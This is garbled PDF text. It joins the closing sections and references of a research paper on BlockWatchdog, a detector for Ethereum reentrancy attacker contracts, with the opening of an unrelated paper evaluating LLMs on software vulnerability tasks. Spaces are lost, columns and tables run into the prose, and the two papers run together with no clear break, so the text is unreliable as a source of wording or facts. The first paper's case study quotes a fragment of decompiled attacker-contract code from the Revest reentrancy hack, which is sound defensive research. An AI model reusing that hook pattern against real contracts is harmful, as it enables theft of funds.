stor_18_0_19.withdrawFNFT(v36, 1 + v2[0]);} hookfunction,asshowninFigure1.Inaddition,BlockWatchdog 5 identified40zero-dayattackercontractsandatotalof159victim 6 function onERC1155Received(address varg0, address varg1, uint256 varg2, uint256 varg3, bytes varg4) public contracts,whichweretargetedbytheattackercontractstoperform nonPayable { reentrancyattacks. 7 ... 8 if (_onERC1155Received != 0) { 9 if (_onERC1155Received == 1) { Table7:Top5AttacksRankedbyFinancialLoss 10 v0 = 0x2007(_onERC1155Received); 11 _onERC1155Received = v0; AttakerContract HookFunction Loss(USD) 12 v1, v2 = stor_19_0_19.getNextId(); 0x10c509aa9ab2 delegatedTransferERC20 904million 13 v3, v4 = stor_18_0_19.depositAdditionalToFNFT(v2 - 0xc51bdc9aebba tokensReceived 0.56million 1, stor_4, 1);} 0x86f28c7030bd onERC721Received 0.28million 14 } else { 15 v5 = 0x2007(_onERC1155Received); 0xbc82ab5a8223 tokensReceived 0.28million 16 _onERC1155Received = v5;} 0x3292818dB514 uniswapV2Call 0.28million 17 return 0xf23a6e61;} Figure7:TheattackercontractthathackedtheRevest. 6 DISCUSSION Inthissection,wefirstgiveacasestudytoshowhowBlockWatch- Theabovecasestudyshowsthepracticalityoftimelyprotection dogcanenhancethesecurityofEthereumbyidentifyingattacker byusingourBlockWatchdog.Intheblockchainsystem,attacks contracts.WethenpresentthecapabilityofBlockWatchdogtofind areirreversible,makingitcriticaltodetectpotentiallythreatening vulnerabilitiesanddiscussthelimitationsofourwork. contractsbeforethestartofanytransaction.BlockWatchdogcan quicklyidentifysuchvulnerablecontracts,therebyimprovingthe 6.1 CaseStudy securityoftheEthereumecosystemintwoways. Figure7showsacodesnippetoftheattackercontractthataimed Firstly,ourtoolcanbeusedforthereal-timedetectionofat- toattackRevest[40]identifiedbyBlockWatchdog.Thisattacker tackercontractsonEthereum,allowingsecurityfirmstoreport contractwasfirstdeployedatMar-27-202201:10:05AM+UTC,and suspiciousattackercontractsinminutes.Sincewedonotrequire abouthalfanhourlater,thefirstattackwaslaunchedatMar-27- transactioninformation,itispossibletopreventattacks.White- 202201:41:46AM+UTC.Specifically,thefunctionwithsignature hats[54],Etherscan[15],andsecurityanalysisfirms,suchasCon- 0xdd869c35wasinvokedbytheexploitertocallvictims.Then,the sensys[8],canquicklyidentifypotentialattackercontractsand call chain was turned back and controlled by the attacker con- victimswithattackfootprintsreportedbyBlockWatchdog(17.66 tracttwicethroughfunctioninvocationbythehookfunctions,i.e., secondsonaverage)beforeattacktransactionsaresent(asshownin uniswapV2Call() (L1-L4)andonERC1155Received() (L6-L17).The theabovecase).However,itiscrucialtoaddresstheethicalimplica- attackercontractqueriedforthenextNFTid(functiongetNextId() tionsofsuchpreemptiveactionsinthispaper.Whileourapproach
(L12))anddepositedanotheroneviathefunctiondepositAddition- facilitatesearlydetectionandprovidesanopportunityforrapid alFNFT()(L13).Finally,anotherNFTwassuccessfullymintedto response,weconsciouslydonotperformon-chainfrontrunning theattackerwithoutbeingpaidinthisreentrancyattack.Ittakes thatcouldbedeemedasethicalissuesorpotentialdisruptivenessto BlockWatchdog64secondstoidentifythisattackercontractandits theblockchain’sintegrity.Furthermore,weusetransactionreplay victimcontract.Thetimegapofhalfanhourbetweenthedeploy- onlytoretrievethebytecodeofthedeployedsmartcontracts. mentoftheattackercontractandtheactualattackfarexceedsthe Secondly,ourtoolcanfindnewtypesofreentrancyvulnera- timecostsofthedetectionprocess.Thisprovidesanopportunity bilitiesthatothertoolsmayhavemissed.Securityfirmscanuse forwhitehatstofront-runthehackersandprotectthevulnerable BlockWatchdogtoidentifyundiscoveredattackercontractsand deployedcontracts.Specifically,whitehatscancopythebytecodeof reentrancyvulnerabilitiesinpractice.PlatformslikeEtherscanla- theattackercontracttoperformtheimitationattack[38]beforethe bel the attacker’s EOA as an attacker account, and warn about realattackislaunched.Therefore,theintendedprofitsofhackers newlydeployedcontractsandrelatedtransactions.ICSE2024,April2024,Lisbon,Portugal ShuoYang,JiachiChen,MingyuanHuang,ZibinZheng,andYuanHuang Forcontractdevelopers,topreventtheircontractsfrombeing conditionalcheckswhentracingpaths,whichyieldsfalsepositives. attackedafterthedeployment,theexternalcalltargetcontract’sad- Third,wesummarizetheattacktypesanddesignthedetectionrules dressshouldbeverifiedin“sensitive”functions,e.g.,tokentransfer basedonthereportedattackincidents.Therefore,itispossiblethat orswaplogic,thusblockingthepremeditatedattacksthatmalicious wemaynotcovernewattacktypesthathavenotyetoccurredor attackercontractscouldlaunch. beenreported.Overall,despitetheabovelimitations,wefocuson detectingnewtypesofreentrancyvulnerabilitiesthatothertools cannotcover.Othertypesofattacksthatinvolveattackercontracts 6.2 CapabilityofFindingVulnerabilities mentionedinSection3arenotaddressedinthispaper,whichwe BlockWatchdogfindsasignificantnumberofexploitablevictim willcoverinfuturework. contractswithexploitablevulnerabilities,andmostofthemcannot bedetectedbycurrenttools.Wechoosesevenreentrancydetec- tiontoolstodetectvictimcontracts:Mythril[30],NFTGuard[57], 6.4 ThreatstoValidity Oyente[28],Sailfish[39],Securify1[48],Securify2[42],andSmar- Regardingourexperiment,themanuallabelingprocessmayhave tian[7],referringtothefourselectrules[57,60],i.e.,(1)availability introducederrorsindifferentiatingfalsepositivesandtruepositives. ofthetoolsourcecode;(2)usabilityofthecommand-lineinterface However,wehaveusedadouble-checkprocesstomitigatethis forlarge-scaleexperiment;(3)supportingSoliditysourcecode;(4) issueandupdatedthelabeleddatasetinatimelymannertoensure abilitytoreportvulnerablecodelocationformanualexamination. accuracy.WevalidatedwhethertherewasanattackonEtherscan Weruntheseseventoolson159victimcontracts,andalloutputs using the call chains reported by BlockWatchdog, collaborated aregiveninouropenrepository. withthetransactiontracerecordedontheonlinetransactiontrace TheresultsshowthatonlyMythrilandSailfishreport1and explorerPhalcon[36],andrecordedfinanciallossaccordingtothe 17victims,respectively,whiletheotherfivetoolsdonotreport transactioninformationobtainedfromEtherscan.Anotherthreat anyreentrancyvulnerability.Therefore,only18outof159(11.3%) tovalidityisthatwedidnotverifythatvulnerablecontractscanbe victimscanbedetectedbycurrenttools.AsBlockWatchdogex- exploitedduetoethicalconcernsaboutattackingthem.Weintend tractsmorefeaturesfromattackercontracts,whichmaybemissed toaddressthisinourfuturework. byotherworks,BlockWatchdogcanmoreeffectivelyidentifyex- Therearesomeothertypesofattackercontracts,e.g.,BadRan- ploitablecontractswithreentrancyvulnerabilitiesinpracticewith domnessandFlashloan,aswementionin3.2,whicharenotcovered betterperformanceandgeneralizability.Therearethreereasons bythiswork.ThedesignofourBlockWatchdogfocusesoncallflow fortheresults.First,manyidentifiedattackercontractsextractto- analysis,whichmakesitpossibletobeextendedtodetectFlashloan kensbutnotEthersfromvictims.However,mostexistingtools attackercontractsthatalsocontainsomeflowfeatures.However, focusoncall.value(),whichonlyinvolvesEthertransfer.Second, morecontractsemanticsandoperationalfeaturesshouldbeana- rule-basedmethodsstruggletocoverissuescausedbypatterns lyzedtocoverotherattackercontracttypeslikeBadRandomness, thathavenotbeenpreviouslyreported,anditisevenharderto whichrequiresunderstandingspecificcontractbehaviors. identifyreentranciesrelatedtouser-definedinterfacesthatcannot Despitethelimitationsmentionedabove,BlockWatchdoghas begeneralizedintoadetectionpattern.Third,existingtoolsdetect detected40zero-dayattackersmartcontractsthatwerepreviously reentrancybasedonstatemodificationinconsistency.However,
unreported,whichhadreentrancyfeatures.SinceBlockWatchdog newreentrancyattacks,e.g.,read-onlyreentrancy,canmakeuseof doesnotrequiretransactioninformationandcanprovidedetection justviewfunctions,e.g.,balanceOf()andgetPrice()toimplement resultswithinminutes,itcanmonitornewlydeployedcontractsand reentrancy.Theseviewfunctionsdonotmodifyanystateandare detectattackercontractsbeforetheycanexecuteattacks,preventing usuallynotprotected,makingexistingtoolsdifficulttodetect. potentialattacksandheavyfinanciallosses. 6.3 Limitations 7 RELATEDWORK DespitethestrengthsofBlockWatchdog,weidentifythreepotential limitations.First,BlockWatchdogreportswhetheraninputcontract Reentrancydetectiontoolsforsmartcontracts. Asreentrancy isanattackercontractornotbasedsolelyonstaticanalysiswithout isoneofthenotoriousvulnerabilitiesinsmartcontracts[41],many transactioninformation.Wecanrecoverthepossiblecallchains programanalysistoolshavebeendevelopedtodetectsuchissuesby oftheinputcontract,includingtransactiondata,whichcanhelp staticanalysisordynamictesting[4–6].Thegoalofthesetoolsisto enhancetheprecisionofdetection.AsweaimtodeployBlock- preventvulnerablecontractsfrombeingdeployedontheblockchain. Watchdogasareal-timedetectionplatformforEthereuminthe For example, Oyente [28], Securify [48], Mythril [30], and Sail- future,transactionsareconsideredasadditionalinformationto fish[39]usestaticanalysistechnologiestodiscoverreentrancy achieveamoreprecisedetectionresultSecond,weidentifyinter- vulnerability.Inaddition,therearedynamictestingandanalysis actedcontractsfromtheconstantaddressorstorage,andbydefault, toolssuchasContractFuzzer[20],sFuzz[31],Smartian[7],RLF[44], werelyontheassumptionthattheattackercontracthardcodesthe andReGuard[27],andapproachesbasedonmachinelearninglike victims’addresses.Althoughwefindthatallthecollectedcases ReVulDL[58].Ascontractcodeandvulnerabilitiesbecomemore belongtothesetwoscenarios,itispossiblethattheattackercon- complex, there are works that focus on cross-contract analysis, tractscansetthetargetcontractintheargumentsofthefunction, suchasClairvoyance[56]andSmartDagger[26].However,many whichwecannotobtainthroughstaticanalysis,thusleadingto ofthesetoolssufferfromhighfalsepositiveratesandmaynot falsenegatives.Inaddition,ourtaintanalysisdoesnotaccountfor identifyrealvulnerablecontractsinpractice[35].UncoverthePremeditatedAttacks:DetectingExploitableReentrancyVulnerabilitiesbyIdentifyingAttackerContracts ICSE2024,April2024,Lisbon,Portugal Toourknowledge,BlockWatchdogisthefirstdetectiontoolto REFERENCES identifyattackercontractsandtheircallchains.Thisfeatureen- [1] 2022. Hacker drains $1.4 million worth of ETH from NFT lender ablesthetooltodetectrealvulnerablevictimcontractsinpractice. Omni. https://www.theblock.co/post/156800/hacker-drains-1-4-million-worth- of-eth-from-nft-lender-omniSection:Hacks. Additionally,BlockWatchdogaddressesthelimitationofcurrent [2] 2022.Medium–Wheregoodideasfindyou. https://medium.com/ reentrancydetectioncapability[60],andcandetectcomplexreen- [3] alchemy2023.alchemy. https://www.alchemy.com/. trancyattacksinthewild. [4] EarlT.Barr,MarkHarman,PhilMcMinn,MuzammilShahbaz,andShinYoo.2015. TheOracleProbleminSoftwareTesting:ASurvey.IEEETransactionsonSoftware SecurityanalysisonattackincidentsonEthereum. Priorre- Engineering41,5(2015),507–525. https://doi.org/10.1109/TSE.2014.2372785 searchonattackanalysisonEthereumhasfocusedonunderstand- [5] AntoniaBertolino.2007.Softwaretestingresearch:Achievements,challenges, dreams.InFutureofSoftwareEngineering(FOSE’07).IEEE,85–103. ingattackincidentsatthetransactionlevel.Forexample,Torreset [6] CristianCadar,DanielDunbar,DawsonREngler,etal.2008.Klee:Unassisted al.[47]conductedanempiricalstudyoffront-runningattackson andautomaticgenerationofhigh-coveragetestsforcomplexsystemsprograms.. Ethereum,whileZhouetal.[61]evaluatedreal-worldattacksand InOSDI,Vol.8.209–224. [7] JaeseungChoi,DoyeonKim,SoominKim,GustavoGrieco,AlexGroce,and defensesintheEthereumecosystem.Theyanalyzedhowattackers SangKilCha.2021.Smartian:Enhancingsmartcontractfuzzingwithstaticand have destroyed applications in Ethereum and discussed how to dynamicdata-flowanalyses.In202136thIEEE/ACMInternationalConferenceon defendagainstattacksfromthevictimcontract’sperspective.Suet AutomatedSoftwareEngineering(ASE).IEEE,227–239. [8] consensys2023.Consensys. https://consensys.net/. al.[45]focusedonDAppsecurityandanalyzedrelatedtransactions [9] C.R.E.A.M.Finance2023.C.R.E.A.M.Finance. https://docs.cream.finance/. tounderstandhowtodetectattacksthroughtransactionanalysis. [10] EIP2023.EthereumImprovementProposals. https://eips.ethereum.org/. [11] eip-552023.EIP-55. https://eips.ethereum.org/EIPS/eip-55. TheydevelopedatoolcalledDEFIERthatcanidentifythestageof [12] ERC-3156: Flash Loans 2023. ERC-3156: Flash Loans.
apotentialattack.However,BlockWatchdogcandetectattacker https://eips.ethereum.org/EIPS/eip-3156. [13] erc1155 2023. ERC-1155 MULTI-TOKEN STANDARD. contractswithoutanyattacktransactions,makingitpossibleto https://ethereum.org/en/developers/docs/standards/tokens/erc-1155/. preventfinancialloss. [14] erc777 2022. ERC-777 TOKEN STANDARD. https://ethereum.org/en/developers/docs/standards/tokens/erc-777/. [15] etherscan 2023. Etherscan - The Ethereum Blockchain Explorer. 8 CONCLUSIONANDFUTUREWORKS https://etherscan.io/. [16] NevilleGrech,MichaelKong,AntonJurisevic,LexiBrent,BernhardScholz,and Inthispaper,wepresentBlockWatchdog,atoolfordetectingreen- YannisSmaragdakis.2018.Madmax:Survivingout-of-gasconditionsinethereum trancyattackercontractsandidentifyingvulnerablevictimswith smartcontracts.ProceedingsoftheACMonProgrammingLanguages2,OOPSLA reentrancyvulnerabilities.Toreducefalsepositives,weusethe (2018),1–27. [17] NevilleGrech,SifisLagouvardos,IliasTsatiris,andYannisSmaragdakis.2022. detectionofattackercontractsasanentrypoint,andidentifyvul- Elipmoc:advanceddecompilationofEthereumsmartcontracts.Proceedingsof nerablevictimcontractsbasedoncallbackflow.TodesignBlock- theACMonProgrammingLanguages6,OOPSLA1(2022),1–27. Watchdog, we conducted an empirical study to understand the [18] Harvard CodeBlue 2018. EIP-721: Non-Fungible Token Standard. https://eips.ethereum.org/EIPS/eip-721. attacklogicusedbyhackersinattackercontracts.BlockWatchdog [19] ivisor2021. VisorFinanceSuffersanotherDeFiHackasLossesMountUpto disassemblesacontract’sbytecodeandmonitorsallpotentialcall $8.2M. https://www.fxempire.com/news/article/defi-protocols-have-lost-680- million-so-far-in-2021-795829. chainsthatinitiatefromitspublicfunctionsandextendtoacces- [20] BoJiang,YeLiu,andWingKwongChan.2018.Contractfuzzer:Fuzzingsmartcon- siblecontractsandfunctions.Besides,BlockWatchdogformulates tractsforvulnerabilitydetection.In201833rdIEEE/ACMInternationalConference thexCFGandxCGtofacilitatecross-contractdataflowanalysisbe- onAutomatedSoftwareEngineering(ASE).IEEE,259–269. [21] SukritKalra,SeepGoel,MohanDhawan,andSubodhSharma.2018. Zeus: tweendifferentproceduresandtodeterminewhetherthecallback analyzingsafetyofsmartcontracts..InNdss.1–12. flowcanbeexploitedbymaliciouscontractstoexecuteasuccessful [22] QuepingKong,JiachiChen,YanlinWang,ZiguiJiang,andZibinZheng.2023. reentrancyattack.OurexperimentresultsdemonstratethatBlock- DeFiTainter:DetectingPriceManipulationVulnerabilitiesinDeFiProtocols. InProceedingsofthe32ndACMSIGSOFTInternationalSymposiumonSoftware Watchdogeffectivelydetects113attackercontractsamong421,889 TestingandAnalysis.1144–1156. real-worldcontractsandidentifies159victimcontractswithreen- [23] JohannesKruppandChristianRossow.2018.teether:Gnawingatethereumto trancyvulnerabilities.ThesevulnerablecontractscontainEthers automaticallyexploitsmartcontracts.In27th{USENIX}SecuritySymposium ({USENIX}Security18).1317–1333. andtokensworthapproximately908.6millionUSD.Only18of [24] lendfme 2020. About Recent Uniswap and Lendf.Me Reentrancy At- themareidentifiedbyotherdetectiontools. tacks. https://medium.com/imtoken/about-recent-uniswap-and-lendf-me- reentrancy-attacks-7cebe834cb3. Furthermore,werevealallpotentialcallchainsofthe421,889 [25] XiaoqiLi,PengJiang,TingChen,XiapuLuo,andQiaoyanWen.2020.Asurvey real-worldcontracts,andwhethertheycontainexternalcallsin onthesecurityofblockchainsystems.Futuregenerationcomputersystems107 hookfunctionsidentifiedbyBlockWatchdog.Thedetectionresults (2020),841–853. [26] ZeqinLiao,ZibinZheng,XiaoChen,andYuhongNan.2022. SmartDagger:a canbehelpfulforfurthersecurityanalysis.Inthefuture,weplan bytecode-basedstaticanalysisapproachfordetectingcross-contractvulnerability. todeployBlockWatchdogforreal-timedetectionpurposes,inorder InProceedingsofthe31stACMSIGSOFTInternationalSymposiumonSoftware tofindmorevulnerablecontractsinpracticeandhelppreventthem TestingandAnalysis.752–764. [27] ChaoLiu,HanLiu,ZhaoCao,ZhongChen,BangdaoChen,andBillRoscoe. frombeingattacked.Inaddition,wewillextendBlockWatchdog 2018.Reguard:findingreentrancybugsinsmartcontracts.InProceedingsofthe tocovernewtypesofattacks,remainingeffectiveinthefaceof 40thInternationalConferenceonSoftwareEngineering:CompanionProceeedings. 65–68. ever-evolvingthreatsonEthereum. [28] LoiLuu,Duc-HiepChu,HrishiOlickel,PrateekSaxena,andAquinasHobor. 2016.Makingsmartcontractssmarter.InProceedingsofthe2016ACMSIGSAC conferenceoncomputerandcommunicationssecurity.254–269. ACKNOWLEDGMENTS [29] BernhardMueller.2018. Smashingethereumsmartcontractsforfunandreal Thisresearch/projectissupportedbytheNationalKeyR&DPro- profit.HITBSECCONFAmsterdam9(2018),54. [30] Mythril2023.Mythril. https://mythril-classic.readthedocs.io/en/master/module-
gram of China (2022YFB2702203), the National Natural Science list.html. FoundationofChina(No.62302534andNo.62332004),andtheAnt [31] TaiDNguyen,LongHPham,JunSun,YunLin,andQuangTranMinh.2020. GroupResearchFund. sfuzz:Anefficientadaptivefuzzerforsoliditysmartcontracts.InProceedingsofICSE2024,April2024,Lisbon,Portugal ShuoYang,JiachiChen,MingyuanHuang,ZibinZheng,andYuanHuang theACM/IEEE42ndInternationalConferenceonSoftwareEngineering.778–788. [60] ZibinZheng,NengZhang,JianzhongSu,ZhijieZhong,MingxiYe,andJiachi [32] IvicaNikolić,AashishKolluri,IlyaSergey,PrateekSaxena,andAquinasHobor. Chen.2023. TurntheRudder:ABeaconofReentrancyDetectionforSmart 2018.Findingthegreedy,prodigal,andsuicidalcontractsatscale.InProceedings ContractsonEthereum. arXiv:2303.13770[cs.SE] ofthe34thannualcomputersecurityapplicationsconference.653–663. [61] ShunfanZhou,ZheminYang,JieXiang,YinzhiCao,MinYang,andYuanZhang. [33] RobertNorvill,BeltranFiz,RaduState,andAndreaCullen.2019.Standardising 2020.Anever-evolvinggame:Evaluationofreal-worldattacksanddefensesin smartcontracts:AutomaticallyinferringERCstandards.In2019IEEEInternational ethereumecosystem.InProceedingsofthe29thUSENIXConferenceonSecurity ConferenceonBlockchainandCryptocurrency(ICBC).IEEE,192–195. Symposium.2793–2809. [34] peckshield2023.Peckshield-IndustryLeadingBlockchainSecurityCompany. https://peckshield.com/. [35] DanielPerezandBenjaminLivshits.2021.SmartContractVulnerabilities:Vul- nerableDoesNotImplyExploited..InUSENIXSecuritySymposium.1325–1341. [36] Phalcon2023.PowerfulTransactionExplorerDesignedForDeFiCommunity. https://explorer.phalcon.xyz/. [37] primitivefinance2023. WhitehackbyPrimitiveFinance:MOSTFUNDSARE SAFE.Useractionrequired. https://primitivefinance.medium.com/whitehack- by-primitive-finance-most-funds-are-safe-user-action-required-4dd31c387b8. [38] KaihuaQin,StefanosChaliasos,LiyiZhou,BenjaminLivshits,DawnSong, andArthurGervais.2023. Theblockchainimitationgame. arXivpreprint arXiv:2303.17877(2023). [39] SriramRao,RaghuRamakrishnan,AdamSilberstein,MikeOvsiannikov,and DamianReeves.2012.Sailfish:Aframeworkforlargescaledataprocessing.In ProceedingsoftheThirdACMSymposiumonCloudComputing.1–14. [40] revest 2022. Revest Finance Vulnerabilities: More than Re-entrancy. https://blocksecteam.medium.com/revest-finance-vulnerabilities-more- than-re-entrancy-1609957b742f. [41] MichaelRodler,WentingLi,GhassanOKarame,andLucasDavi.2018.Sereum: Protectingexistingsmartcontractsagainstre-entrancyattacks.arXivpreprint arXiv:1812.05934(2018). [42] Securify2.02023.Securify2.0. https://github.com/eth-sri/securify2. [43] DonnaSpencer.2009.Cardsorting:Designingusablecategories.RosenfeldMedia. [44] JianzhongSu,Hong-NingDai,LingjunZhao,ZibinZheng,andXiapuLuo.2022. Effectivelygeneratingvulnerabletransactionsequencesinsmartcontractswith reinforcementlearning-guidedfuzzing.InProceedingsofthe37thIEEE/ACM InternationalConferenceonAutomatedSoftwareEngineering.1–12. [45] LiyaSu,XinyueShen,XiangyuDu,XiaojingLiao,XiaoFengWang,LuyiXing, andBaoxuLiu.2021.Evilunderthesun:understandinganddiscoveringattacks onEthereumdecentralizedapplications.In30thUSENIXSecuritySymposium (USENIXSecurity21).1307–1324. [46] NickSzabo.1997.Formalizingandsecuringrelationshipsonpublicnetworks. Firstmonday(1997). [47] ChristofFerreiraTorres,RamiroCamino,andRaduState.2021. Frontrunner jonesandtheraidersofthedarkforest:Anempiricalstudyoffrontrunningon theethereumblockchain.arXivpreprintarXiv:2102.03347(2021). [48] PetarTsankov,AndreiDan,DanaDrachsler-Cohen,ArthurGervais,Florian Buenzli,andMartinVechev.2018.Securify:Practicalsecurityanalysisofsmart contracts.InProceedingsofthe2018ACMSIGSACConferenceonComputerand CommunicationsSecurity.67–82. [49] Twitter2023.Twitter. https://twitter.com/. [50] UniswapV2 2023. UniswapV2. https://github.com/Uniswap/v2- core/blob/master/contracts/UniswapV2Pair.sol. [51] uniswap_v3 2023. The Uniswap V3 Smart Contracts. https://docs.uniswap.org/contracts/v3/overvie. [52] web3py2023.web3py. https://web3py.readthedocs.io/en/stable/web3.eth.html. [53] SamWerner,DanielPerez,LewisGudgeon,AriahKlages-Mundt,DominikHarz, andWilliamKnottenbelt.2022.Sok:Decentralizedfinance(defi).InProceedings ofthe4thACMConferenceonAdvancesinFinancialTechnologies.30–46. [54] whitehats2023. WhyWhiteHatHackersAreVitaltotheCryptoEcosys- tem. https://www.coindesk.com/layer2/2022/02/23/why-white-hat-hackers- are-vital-to-the-crypto-ecosystem/. [55] KaidongWu.2019.Anempiricalstudyofblockchain-baseddecentralizedappli- cations.arXivpreprintarXiv:1902.04969(2019).
[56] YinxingXue,MingliangMa,YunLin,YuleiSui,JiamingYe,andTianyongPeng. 2020. Cross-contractstaticanalysisfordetectingpracticalreentrancyvulner- abilitiesinsmartcontracts.InProceedingsofthe35thIEEE/ACMInternational ConferenceonAutomatedSoftwareEngineering.1029–1040. [57] ShuoYang,JiachiChen,andZibinZheng.2023. DefinitionandDetectionof DefectsinNFTSmartContracts.InProceedingsofthe32ndACMSIGSOFTInter- nationalSymposiumonSoftwareTestingandAnalysis(Seattle,WA,USA)(ISSTA 2023).AssociationforComputingMachinery,NewYork,NY,USA,373–384. https://doi.org/10.1145/3597926.3598063 [58] ZhuoZhang,YanLei,MengYan,YueYu,JiachiChen,ShangwenWang,and XiaoguangMao.2022. Reentrancyvulnerabilitydetectionandlocalization:A deeplearningbasedtwo-phaseapproach.InProceedingsofthe37thIEEE/ACM InternationalConferenceonAutomatedSoftwareEngineering.1–13. [59] ZibinZheng,ShaoanXie,Hong-NingDai,WeiliChen,XiangpingChen,Jian Weng,andMuhammadImran.2020.Anoverviewonsmartcontracts:Challenges, advancesandplatforms.FutureGenerationComputerSystems105(2020),475–491.
2404.02056 1 Multitask-based Evaluation of Open-Source LLM on Software Vulnerability Xin Yin, Chao Ni⋆, and Shaohua Wang Abstract— This paper proposes a pipeline for quantitatively evaluating interactive Large Language Models (LLMs) using publicly available datasets. We carry out an extensive technical evaluation of LLMs using Big-Vul covering four different common software vulnerability tasks. This evaluation assesses the multi-tasking capabilities of LLMs based on this dataset. We find that the existing state-of-the-artapproachesandpre-trainedLanguageModels(LMs)aregenerallysuperiortoLLMsinsoftwarevulnerabilitydetection. However,insoftwarevulnerabilityassessmentandlocation,certainLLMs(e.g.,CodeLlamaandWizardCoder)havedemonstratedsu- periorperformancecomparedtopre-trainedLMs,andprovidingmorecontextualinformationcanenhancethevulnerabilityassessment capabilitiesofLLMs.Moreover,LLMsexhibitstrongvulnerabilitydescriptioncapabilities,buttheirtendencytoproduceexcessiveoutput significantlyweakenstheirperformancecomparedtopre-trainedLMs.Overall,thoughLLMsperformwellinsomeaspects,theystill needimprovementinunderstandingthesubtledifferencesincodevulnerabilitiesandtheabilitytodescribevulnerabilitiestofullyrealize theirpotential.OurevaluationpipelineprovidesvaluableinsightsintothecapabilitiesofLLMsinhandlingsoftwarevulnerabilities. IndexTerms—SoftwareVulnerabilityAnalysis,LargeLanguageModel. ✦ 1 INTRODUCTION Software Vulnerabilities (SVs) can expose software sys- to individuals. As a cornerstone of software quality assur- temstorisksituationsandeventuallycausehugeeconomic ance,theseamlessintegrationoftheseactivitiesunderscores lossesoreventhreatenpeople’slives.Therefore,completing the importance of a proactive and thorough approach to software vulnerabilities is an important task for software managing software vulnerabilities in today’s dynamic and quality assurance (SQA). Generally, there are many impor- interconnecteddigitallandscape. tant software quality activities for software vulnerabilities such as SV detection, SV assessment, SV location, and SV description. The relationship among the SQA activities is RQ-2 Vulnerability intricateandinterdependentandcanbeillustratedinFig.1. Assessment SV detection serves as the initial phase, employing various Source Vulnerability Vulnerability Vulnerability LLM tools and techniques to identify potential vulnerabilities Code Detection Location Description Output within the software. Once detected, the focus shifts to SV RQ-1 RQ-3 RQ-4 assessment, where the severity and potential impact of Fig. 1: The relationship among software vulnerability anal- each vulnerability are meticulously evaluated. This critical ysisactivities evaluation informs the subsequent steps in the process. SV locationfollowstheassessment,pinpointingtheexactareas within the software’s code or architecture where vulner- Recently, Large Language Models (LLMs) [1] have been abilities exist. This step is crucial for precise remediation widely adopted since the advances in Natural Language efforts and to prevent the recurrence of similar vulnera- Processing (NLP) which enable LLM to be well-trained bilities in the future. The intricacies of SV location feed with both billions of parameters and billions of training intothecomprehensiveSVdescription,whichencapsulates samples, consequently bringing a large performance im- detailed information about each vulnerability, including its provement on tasks adopted by LLMs. LLMs can be easily origin,characteristics,andpotentialexploits.Inessence,the used for a downstream task by being fine-tuned [2] or synergy among SV detection, SV assessment, SV location, beingprompted[3]sincetheyaretrainedtobegeneraland andSVdescriptioncreatesarobustpipelineforaddressing theycancapturedifferentknowledgefromvariousdomain software vulnerabilities comprehensively. This systematic data. Fine-tuning is used to update model parameters for approach not only enhances the overall quality of the soft- a particular downstream task by iterating the model on ware but also fortifies it against potential threats, thereby a specific dataset while prompting can be directly used safeguarding against economic losses and potential harm by providing natural language descriptions or a few ex- amples of the downstream task. Compared to prompting, fine-tuning is expensive since it requires additional model BothXinYinandChaoNiarewiththeStateKeyLaboratoryofBlockchainand DataSecurity,ZhejiangUniversity,Hangzhou,China.ChaoNiisalsowith trainingandhaslimitedusagescenarios,especiallyincases HangzhouHigh-TechZone(Binjiang)BlockchainandDataSecurityResearch wheresufficienttrainingdatasetsareunavailable. Institute,Hangzhou,China.E-mail:{xyin,chaoni}@zju.edu.cn. LLMshavedemonstratedremarkablelanguagecompre- ShaohuaWangiswithCentralUniversityofFinanceandEconomics,China. hension and generation capabilities, and have been able to E-mail:davidshwang@ieee.org. ChaoNiisthecorrespondingauthor. perform well on a variety of natural language processing 4202 luJ 6 ]ES.sc[ 3v65020.4042:viXra2 Detection Detection Detection* Description* Assessment Description Assessment Description Assessment* Location* Detection Detection Location Location Detection DeepSeek 6.7B CodeLlama 7B StarCoder 7B DeepSeek 6.7B DeepSeek 33B StarCoder 7B CodeLlama 34B WizardCoder 7B Mistral 7B Phi-2 2.7B StarCoder 7B StarCoder 15.5B WizardCoder 7B WizardCoder 34B (a) LLMs’performanceondifferentsoftwarevulnerabilitytasks (b) TheimpactsofparametersizesonLLMs’performanceacrossdiffer- (∗referstotheresultsunderfine-tuningsetting) entsoftwarevulnerabilitytasks Fig.2:ThecapabilitycomparisonofLLMswithdifferentparametersizesondifferentsoftwarevulnerabilitytasks
tasks,suchastextsummarization[4].Giventheoutstanding SV assessment frameworks CVSS (Common Vulnera- performanceofLLMs,thereisagrowingfocusonexploring bilityScoringSystem)[20],whichcharacterizesSVsby their potential in software engineering tasks and seeking considering three metric groups: Base, Temporal, and newopportunitiestoaddressthem.Currently,asmoreand Environmental. The metrics that are in the groups can more LLMs designed for software engineering tasks are befurtherusedasthecriterionforselectingseriousSVs deployed[5]–[11],manyresearchworksfocusedontheap- to fix early. Therefore, we aim to explore the ability plicationofLLMsinthesoftwareengineeringdomain[12]– of LLMs to assess vulnerabilities and compare their [16].However,intheexistingliterature,adequatesystematic performancewithpre-trainedLMs. reviewsandsurveyshavebeenconductedonLLMsinareas • RQ-3: How do LLMs perform on vulnerability lo- suchasgeneratinghigh-qualitycodeandhigh-coveragetest cation? Identifying the precise location of vulnerabil- cases [17], [18], but a systematic review and evaluation of ities in software systems is of critical importance for open-source LLMs in the field of software vulnerability is mitigating risks and improving software quality. The stillmissing. vulnerability location task involves pinpointing these Inthispaper,wefocusonevaluatingLLMs’performance weaknesses accurately and helps to narrow the scope in various software vulnerability (SV)-related tasks in few- fordeveloperstofixproblems.Therefore,weaimtoin- shot and fine-tuning settings to obtain a basic, comprehen- vestigateLLMs’capabilityineffectivelyidentifyingthe sive, and better understanding of their multi-task ability, precise location of vulnerabilities in software systems, andweaimtoanswerthefollowingresearchquestions. alongside evaluating their performance against state- of-the-artapproachesandpre-trainedLMs. • RQ-1: How do LLMs perform on vulnerability de- • RQ-4: How do LLMs perform on vulnerability de- tection?SoftwareVulnerabilities(SVs)canexposesoft- scription? The vulnerability description task focuses ware systems to risk situations and consequently soft- onconveyingadetailedexplanationoftheseidentified ware function failure. Therefore, detecting these SVs is issues in the source codes and helps participants to an important task for software quality assurance. We better understand the risk as well as its impacts. Un- aim to explore the ability of LLMs on vulnerability derstandingtheintricaciesofvulnerabilitiesinsoftware detection as well as the performance difference com- systemsplaysapivotalroleinalleviatingrisksandbol- pared with state-of-the-art approaches and pre-trained stering software quality. The vulnerability description LanguageModels(LMs). task focuses on conveying a detailed explanation of • RQ-2: How do LLMs perform on vulnerability as- these identified issues in the source codes and helps sessment? In practice, due to the limitation of SQA participants to better understand the risk as well as resources [19], it is impossible to treat all detected SVs its impacts. Our goal is to evaluate LLMs’ ability to 